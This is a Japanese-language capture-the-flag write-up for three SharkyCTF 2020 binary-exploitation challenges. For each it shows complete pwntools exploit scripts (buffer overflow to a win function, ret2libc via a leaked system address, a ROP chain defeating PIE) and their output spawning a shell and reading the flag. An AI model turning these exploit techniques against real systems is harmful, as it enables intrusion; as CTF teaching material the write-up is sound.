SharkyCTF【Write-up】
Give away 0
$ file 0_give_away 0_give_away: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e0fb611b13ac822d3074696fb8bb10ea80c05882, not stripped
$ checksec.sh --file=./0_give_away RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFYFortified Fortifiable FILE Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 71 Symbols No 01 ./0_give_away
execve("/bin/sh",0,0)を実行してくれる関数が用意されてるのでBOFしてそこに飛ばすだけです。
from pwn import * e = ELF('./0_give_away') #p = process('./0_give_away') p = remote('sharkyctf.xyz',20333) ret_addr = 0x0040050e win_addr = e.symbols['win_func'] payload = 'A'*40 payload += p64(win_addr) p.sendline(payload) p.interactive()
$ python solve.py [*] '/Sharky_CTF_2020/Give_away_0/0_give_away' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to sharkyctf.xyz on port 20333: Done [*] Switching to interactive mode $ id uid=1000(pwnuser) gid=1001(pwnuser) groups=1001(pwnuser),1000(ctf) $ ls 0_give_away flag.txt start.sh $ cat flag.txt shkCTF{#Fr33_fL4g!!_<3}
Give away 1
$ file give_away_1 give_away_1: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2b72e93281e97df94bf8362d5cf5a29f55accb8a, not stripped
$ checksec.sh --file=./give_away_1 RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFYFortified Fortifiable FILE Full RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH 78 Symbols No 02 ./give_away_1
実行してみるとなにかのアドレスが出力されています。
gdbで何か確認してみるとsystem関数のようです。
──────────────────────[ DISASM ]─────────────────────── 0x5655570f <main+31> sub esp, 8 0x56555712 <main+34> mov eax, dword ptr [ebx + 0x20] 0x56555718 <main+40> push eax 0x56555719 <main+41> lea eax, [ebx - 0x17fc] 0x5655571f <main+47> push eax ► 0x56555720 <main+48> call printf@plt <0x565554c0> format: 0x565557c0 ◂— 'Give away: %p\n' vararg: 0xf7e088b0 (system) ◂— endbr32 0x56555725 <main+53> add esp, 0x10 0x56555728 <main+56> call vuln <0x565556bd> 0x5655572d <main+61> mov eax, 0 0x56555732 <main+66> lea esp, [ebp - 8] 0x56555735 <main+69> pop ecx pwndbg>
libcも用意されているのでlibcのsystem関数のアドレスと出力されてるsystem関数のアドレスのオフセットを求めればlibcがリークできます。 あとはそれを元にsystem("/bin/sh")を用意するだけです。
from pwn import * e = ELF('./give_away_1') p = remote('sharkyctf.xyz',20334) libc = ELF('./libc-2.27.so') print p.recvuntil('Give away: ') ret = int(p.recvline(),16) libc_base_addr = ret - libc.symbols['system'] binsh_addr = next(libc.search("/bin/sh")) + libc_base_addr payload = 'A'*36 payload += p32(ret) payload += 'AAAA' payload += p32(binsh_addr) p.sendline(payload) p.interactive()
$ python solve.py [*] '/Sharky_CTF_2020/Give_away_1/give_away_1' Arch: i386-32-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled [+] Opening connection to sharkyctf.xyz on port 20334: Done [*] '/Sharky_CTF_2020/Give_away_1/libc-2.27.so' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled Give away: [*] Switching to interactive mode $ id uid=1000(pwnuser) gid=1001(pwnuser) groups=1001(pwnuser),1000(ctf) $ ls flag.txt give_away_1 start.sh $ cat flag.txt shkCTF{I_h0PE_U_Fl4g3d_tHat_1n_L3ss_Th4n_4_m1nuT3s}
Give away 2
$ file give_away_2 give_away_2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=5c93b7c4ff1a036cb291045d3ab76155d22ce1a6, not stripped
$ checksec.sh --file=./give_away_2 RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFYFortified Fortifiable FILE Full RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH 73 Symbols No 02 ./give_away_2
PIE有効なのは面倒そうだと思いながら実行してみるとまたなにかのアドレスが出力されています。
$ ./give_away_2 Give away: 0x55be73c68864
gdbでなんのアドレスか確認します。
──────────────────────[ DISASM ]─────────────────────── 0x555555554868 <main+4> mov eax, 0 0x55555555486d <main+9> call init_buffering <0x5555555547e0> 0x555555554872 <main+14> lea rsi, [rip - 0x15] <0x555555554864> 0x555555554879 <main+21> lea rdi, [rip + 0xa4] 0x555555554880 <main+28> mov eax, 0 ► 0x555555554885 <main+33> call printf@plt <0x555555554690> format: 0x555555554924 ◂— 'Give away: %p\n' vararg: 0x555555554864 (main) ◂— push rbp 0x55555555488a <main+38> mov eax, 0 0x55555555488f <main+43> call vuln <0x555555554841> 0x555555554894 <main+48> mov eax, 0 0x555555554899 <main+53> pop rbp 0x55555555489a <main+54> ret
main関数がリークされているのでこれを元にオフセットを求めればPIEを無効にできます。あとはGive away 1と同じく適当なGOTからlibcをリークしてsystem("/bin/sh")を実行するだけです。
from pwn import * e = ELF('./give_away_2') p = remote('sharkyctf.xyz',20335) libc = ELF('./libc-2.27.so') print p.recvuntil('Give away: ') ret = int(p.recvline(),16) proc_base_addr = ret - e.symbols['main'] ret_addr = 0x00000676 + proc_base_addr pop_rdi_addr = 0x00000903 + proc_base_addr payload = 'A'*40 payload += p64(ret_addr) payload += p64(pop_rdi_addr) payload += p64(e.got['printf'] + proc_base_addr) payload += p64(e.symbols['printf'] + proc_base_addr) payload += p64(e.symbols['_start'] + proc_base_addr) p.sendline(payload) ret = u64(p.recvline()[:6] + '\x00\x00') libc_base_addr = ret - libc.symbols['printf'] system_addr = libc.symbols['system'] + libc_base_addr binsh_addr = next(libc.search("/bin/sh")) + libc_base_addr payload = 'A'*40 payload += p64(ret_addr) payload += p64(pop_rdi_addr) payload += p64(binsh_addr) payload += p64(system_addr) p.sendline(payload) p.interactive()
$ python solve.py [*] '/Sharky_CTF_2020/Give_away_2/give_away_2' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled [+] Opening connection to sharkyctf.xyz on port 20335: Done [*] '/Sharky_CTF_2020/Give_away_2/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled Give away: [*] Switching to interactive mode $ id uid=1000(pwnuser) gid=1001(pwnuser) groups=1001(pwnuser),1000(ctf) $ ls flag.txt give_away_2 start.sh $ cat flag.txt shkCTF{It's_time_to_get_down_to_business}